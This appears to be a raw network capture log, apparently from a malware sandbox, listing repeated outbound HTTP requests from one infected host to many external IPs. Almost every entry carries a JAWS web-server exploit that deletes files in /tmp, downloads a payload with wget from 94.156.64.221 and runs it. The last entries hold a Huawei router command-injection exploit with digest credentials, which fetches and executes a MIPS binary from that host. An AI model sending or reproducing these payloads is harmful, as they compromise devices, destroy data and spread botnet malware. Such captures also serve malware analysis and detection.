                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    132192.168.2.234319660.224.142.180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.238559961 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    133192.168.2.2332936189.82.218.13280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.238595963 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    134192.168.2.235303253.223.178.6480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.238640070 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    135192.168.2.235936845.9.82.5280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.238678932 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    136192.168.2.233994069.42.202.17180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.238712072 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    137192.168.2.233514024.72.9.8280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.238761902 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    138192.168.2.2356774145.92.78.7380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.238811016 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    139192.168.2.2340456132.66.64.3880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.238863945 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    140192.168.2.2333194222.37.4.580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.238913059 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    141192.168.2.233735066.47.79.13380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.238960981 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    142192.168.2.233331867.147.165.3480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239075899 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    143192.168.2.235346695.127.175.22780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239111900 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    144192.168.2.2348614179.122.233.20780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239157915 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    145192.168.2.2344888161.43.121.18580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239201069 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    146192.168.2.2353154206.73.46.11480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239284039 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    147192.168.2.235047439.24.219.24980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239370108 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    148192.168.2.234821285.238.207.25180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239397049 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    149192.168.2.234437832.62.55.4380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239434958 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    150192.168.2.2347694134.80.188.6880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239470005 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    151192.168.2.234519042.11.130.13680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239496946 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    152192.168.2.234136241.189.31.6880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239532948 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    153192.168.2.2350710198.203.182.17580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239572048 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    154192.168.2.2348026124.204.6.2580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239605904 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    155192.168.2.2345958146.155.139.10180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239636898 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    156192.168.2.2354808118.249.69.7880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239670038 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    157192.168.2.2352274106.72.36.5180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239716053 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    158192.168.2.234957042.187.49.11880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239734888 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive
                    Jun 1, 2024 18:15:54.314112902 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    159192.168.2.2349860145.13.166.24080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239777088 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    160192.168.2.235003699.223.38.23680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239818096 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    161192.168.2.2343072107.118.12.9680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239856958 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    162192.168.2.2338226156.33.185.7280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239895105 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    163192.168.2.2335692211.152.213.18580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239931107 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    164192.168.2.2355520118.167.64.17580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239974976 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    165192.168.2.2344968176.78.160.13880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.239985943 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    166192.168.2.233368841.108.232.8580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.240025043 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    167192.168.2.233830687.233.87.11980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.240073919 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    168192.168.2.234268213.15.216.15480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.240103960 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    169192.168.2.2353534219.191.228.1080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.240221024 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    170192.168.2.235094076.115.82.13480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.240252018 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    171192.168.2.2344588176.104.168.23980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.240295887 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    172192.168.2.2349912116.128.48.22480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.240319967 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    173192.168.2.2359202104.134.7.6880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.240356922 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    174192.168.2.2335516209.98.115.13680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.240411997 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    175192.168.2.2335078157.151.151.6380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.240458012 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    176192.168.2.234174680.152.111.15480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.240509987 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    177192.168.2.2341472213.46.243.20980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.240566015 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    178192.168.2.2338122149.39.112.10680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.240600109 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    179192.168.2.2339258108.12.66.22280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.240636110 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    180192.168.2.2339030217.30.58.22780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.240667105 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    181192.168.2.2332974190.157.211.9480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.240725040 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    182192.168.2.2343640123.15.159.15380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.241554022 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    183192.168.2.2337588212.34.153.12080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.241601944 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    184192.168.2.2352486173.159.67.3880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.241926908 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    185192.168.2.234865841.164.227.20837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.251061916 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    186192.168.2.2337366156.33.225.22837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.251192093 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
